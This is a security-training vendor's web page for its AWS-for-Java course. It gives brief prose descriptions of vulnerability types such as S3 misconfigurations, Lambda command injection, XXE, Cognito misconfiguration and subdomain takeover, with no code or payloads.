Region

Login

Support

Top 10 vulnerabilities AWS for Java

Get Trained and Stay Ahead of Cybersecurity Threats with Our Vast Library of Application Security Training Content.

Dangerous Dependencies

In modern applications, developers often use third-party packages and/or framework libraries from a variety of sources, both commercial and open source. A challenge often seen when using such third-party software dependencies is keeping up to date with the most recent versions of these software components, especially when it comes to security issues being reported within these libraries and frameworks. If not addressed, this can help open up the attack surface of your web application.
Javascript vulnerabilities

Insecure S3 POST upload policy

AWS supports HTTP FORM-based file uploads to S3 via browsers (HTTP POST requests). Developers can declare HTML forms that contain detailed information about the request, as well as the ACL policy that is used to authenticate it and ensure that it meets the conditions defined by the application owner. However, if the policy is misconfigured or not set up correctly, attackers can exploit the insecure ACL policy to upload files to the S3 bucket and/or overwrite the contents of an existing file with malicious changes.

Lambda Command Injection

Code Injection is a general type of attack that injects code that is then interpreted or executed by the application, usually due to missing or insufficient input validation. Command Injection more specifically refers to the injection of operating system commands, which often allow attackers to compromise the whole application, take full control of the server, and even attack other systems within the organization.

Lamda XML Entity Injection

XML External Entity (XXE) Injection is an attack targeting applications that transmit data between browser and server in XML format. By intercepting and modifying the data, an attacker can exploit potentially dangerous features of standard XML libraries, such as the parsing and loading of external entities, in order to gain access to the server’s filesystem or to interact with backend systems that the application has access to.

Leftover Debug Code

Leftover debug comments or code can provide entry points for attackers to gain access through functionality that was specifically designed for debugging or testing purposes and was not intended to be deployed with the application. Forgetting to remove these back doors creates serious security risks, as they often provide ways to bypass access controls.

Misconfigured AWS Cognito Attributes

With Amazon Cognito “User Pools”, developers can quickly add authentication features and workflows including sign up and sign in, offer password changes for authenticated users, and initiate forgotten password flows for unauthenticated users. However, in its default state “user pools” allow features that if not configured correctly can allow potential attackers to escalate their privileges and compromise the integrity of your application.

Misconfigured AWS Cognito profile allows self-registration

Amazon Cognito is Amazon Web Services’ service for managing user authentication and access control by providing a fully managed, scalable sign-up/sign-in service for application developers. However, certain options within AWS Cognito if enabled may allow users to access features that could lead to unauthorized access, such as through open self-registration API’s.

Misconfigured Reverse Proxy

When developing software in cloud-native environments, reverse proxy servers are often used by developers as an intermediary server to forward or direct requests to backend servers or to access resources that may otherwise be disabled by corporate firewalls from being accessed externally. However, misconfigured proxies can pose a threat, especially for cloud environments, since adversaries can exploit subtle misconfigurations to query sensitive endpoints, including gaining access to AWS’s instance metadata.

S3 Bucket Authenticated Users 'WRITE' Access

Granting authenticated “WRITE” access to AWS S3 buckets can allow unauthorized users to upload, modify and delete S3 objects. Using this overly permissive ACL configuration can lead to S3 data loss and further allow (UPLOAD/DELETE) access which further gives attackers the capability to add, delete and replace objects within the bucket without restrictions.

S3 Bucket Public 'READ' Access

Granting public “READ” access to your S3 buckets can allow unauthorized users to list the objects available within the buckets and use this information to gain access to your data. Additionally, malicious users can exploit the information acquired through the listing process of S3 buckets to find objects with misconfigured ACL permissions and access these compromised objects.

S3 Directory Traversal

Directory traversal is a type of attack that is used to gain unauthorized access to restricted directories and files. It exploits how vulnerable web applications construct file paths when serving assets, in order to navigate through the directory structure of the server running the application. An attacker might be able to read sensitive configuration files, access credentials for backend systems, and even gather enough information to take control of the server.

Subdomain Takeover

A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name in the Domain Name System (DNS), but no host is providing content for it. This can happen because either a virtual host hasn’t been published yet or a virtual host has been removed. An attacker can take over that subdomain by providing their own virtual host and then hosting their own content for it.

Ready to get started?

Experience the full Kontra platform and see what it can do for you and your team.

Get Your Free Trial

Download Syllabus

Let’s Talk

Download Syllabus

Apprenticeship Program

Apprenticeship Program

Let’s Talk

Access our Free OWASP Top 10 for Web

Enter your information below to join our referral program and gain FREE access for 14 days

Follow the steps below to get FREE access to our OWASP top 10 for Web course for 14 days

  1. Simply copy the LinkedIn message below
  2. Post the message on your LinkedIn profile
  3. We will contact you as soon as possible on LinkedIn and send you an invite to access our OWASP Top 10 for Web course

IMPORTANT!

Make sure you confirm the tag @ThriveDX Enterprise after pasting the text below in your LinkedIn to avoid delays in getting access to the course.
tagging ThriveDX Enterprise on LinkedIn

Ready to Share?

Take me to now >

Contact ThriveDX Partnerships

[forminator_form id=”10629″]
Skip to content